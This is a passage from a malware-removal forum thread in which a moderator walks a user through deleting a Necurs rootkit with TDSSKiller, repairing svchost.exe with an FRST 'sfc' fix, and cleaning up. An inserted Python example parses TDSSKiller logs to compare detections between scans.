    GeekU Moderator

  • Retired Staff
  • 69,964 posts

OK, run TDSSKiller again please, and when you see this entry select Delete:

23:29:46.0551 0x18f4 8299bf85dcfa9606 ( Rootkit.Win32.Necurs.gen )

Then run a fresh FRST scan and let me know how the computer is behaving


  • 0
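Added example, not part of the post above and not code from TDSSKiller or FRST: a small Python triage of a TDSSKiller log in the line format quoted in this thread. It separates entries whose verdict names a family from the generic flags, and compares a first scan with a rescan. The function names, the treatment of `.Multi.Generic` verdicts as generic flags, and the shortened sample are assumptions.

```python
import re
from collections import Counter

# time, thread id, object name, "( verdict )", optional " - status" suffix
ENTRY = re.compile(
    r"^\d{2}:\d{2}:\d{2}\.\d{4}\s+0x[0-9a-fA-F]+\s+"
    r"(?P<name>\S+)\s+\(\s*(?P<verdict>[\w.]+)\s*\)"
    r"(?:\s+-\s+(?P<status>.*\S))?\s*$"
)
# Assumption: verdicts ending in .Multi.Generic are heuristic flags, not a named family.
GENERIC_SUFFIX = ".Multi.Generic"

def parse(log_text):
    """Return {(name, verdict): last status seen}; each object is logged twice."""
    found = {}
    for line in log_text.splitlines():
        m = ENTRY.match(line)
        if m:
            key = (m["name"], m["verdict"])
            found[key] = m["status"] or found.get(key)
    return found

def summary(log_text):
    """Count distinct objects per verdict class."""
    return Counter(verdict for _, verdict in parse(log_text))

def named_detections(log_text):
    """Objects whose verdict names a specific family rather than a generic flag."""
    return sorted(k for k in parse(log_text) if not k[1].endswith(GENERIC_SUFFIX))

def still_present(before, after):
    """Named detections from the first scan that the rescan reports again."""
    return sorted(set(named_detections(before)) & set(named_detections(after)))

# Sample built from lines quoted in this thread (a constructed excerpt, not the full log).
FIRST_SCAN = """\
23:29:46.0551 0x18f4  8299bf85dcfa9606 ( Rootkit.Win32.Necurs.gen )
23:29:47.0664 0x18f4  sffp_sd ( LockedFile.Multi.Generic ) - User select action: Skip
23:29:47.0667 0x18f4  sfloppy ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0667 0x18f4  sfloppy ( LockedFile.Multi.Generic ) - User select action: Skip
23:29:47.0839 0x18f4  MusicManager ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:47.0839 0x18f4  MusicManager ( UnsignedFile.Multi.Generic ) - User select action: Skip
"""
# Constructed rescan: same objects, rootkit entry no longer reported.
RESCAN = "\n".join(FIRST_SCAN.splitlines()[1:])

if __name__ == "__main__":
    print(summary(FIRST_SCAN))
    print(named_detections(FIRST_SCAN))
    print(still_present(FIRST_SCAN, RESCAN))
```

An empty `still_present` result means only that the scanner no longer reports the entry; it compares two logs and does not show anything the scanner itself cannot see.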

#8
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

Thanks for checking back in. I've run the TDSSKiller scan, "delete" the Rootkit, and just run a FRST scan. Computer seems to be running smoother now. I've attached the FRST scan log just in case. Is there a sure-fire way to check I've got rid of the rootkit?

 

Thanks a lot.

Attached Files

  • Attached File  FRST.txt   42.07KB   146 downloads

  • 0

#9
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
One final bit of repair and you should be good to go

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 

cmd: sfc /scanfile=C:\Windows\SysWOW64\svchost.exe


Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated; please post that.
  • 0

#10
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

This is the log:

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by Joe (2016-03-29 15:49:17) Run:3
Running from C:\Users\Joe\Downloads
Loaded Profiles: Joe (Available Profiles: Joe)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
cmd: sfc /scanfile=C:\Windows\SysWOW64\svchost.exe
*****************
 
 
=========  sfc /scanfile=C:\Windows\SysWOW64\svchost.exe =========
 
 
 
 
Windows Resource Protection found corrupt files and successfully repaired 
 
them. Details are included in the CBS.Log windir\Logs\CBS\CBS.log. For 
 
example C:\Windows\Logs\CBS\CBS.log
 
 
========= End of CMD: =========
 
 
==== End of Fixlog 15:49:21 ====

  • 0

#11
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Excellent... Any further problems before I remove all my tools and tidy you up?
  • 0

#12
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts
No other problems, thanks for the help.
  • 0

#13
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Subject to no further problems :)

I will remove my tools now and give some recommendations, but, I would like you to run for 24 hours or so and come back if you have any problems

Now the best part of the day ----- Your log now appears clean :thumbsup:

A good workman always cleans up after himself, so... The following will implement some cleanup procedures as well as reset System Restore points:

Remove tools

Download and run Delfix
Select the options as shown


: Keep Java Updated :

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java.
See this article

I would recommend that you completely uninstall Java unless you need it to run important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to disable Java in your web browser and How to unplug Java from the browser)

If you do need to keep Java then download JavaRa
Run the programme and select Remove Java Runtime. Uninstall all versions of Java present
Once done then run it again and select Update Java runtime > Download and install Latest version


Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent: install this programme to lock down and prevent crypto ransomware

Malwarebytes

Update and run weekly to keep your system clean

Unchecky

Click on the link above to be taken to Unchecky.com
Click the very large Download button.
Click Save
Click Open folder
Right click on the Unchecky_setup and choose to Run as Administrator
Once open click the Install button.
Then click on Finish
Unchecky is now installed and will help you keep unwanted check boxes unchecked. This is a fire and forget programme ;)

It is critical to have both a firewall and anti virus to protect your system and to keep them updated.

To learn more about how to protect yourself while on the internet, read this little guide: Best security practices. Keep safe :wave:
  • 0

#14
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

Thanks for all your help, I shall check back in tomorrow evening/night time and hopefully all will be solved!


  • 0

#15
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts

:)


  • 0





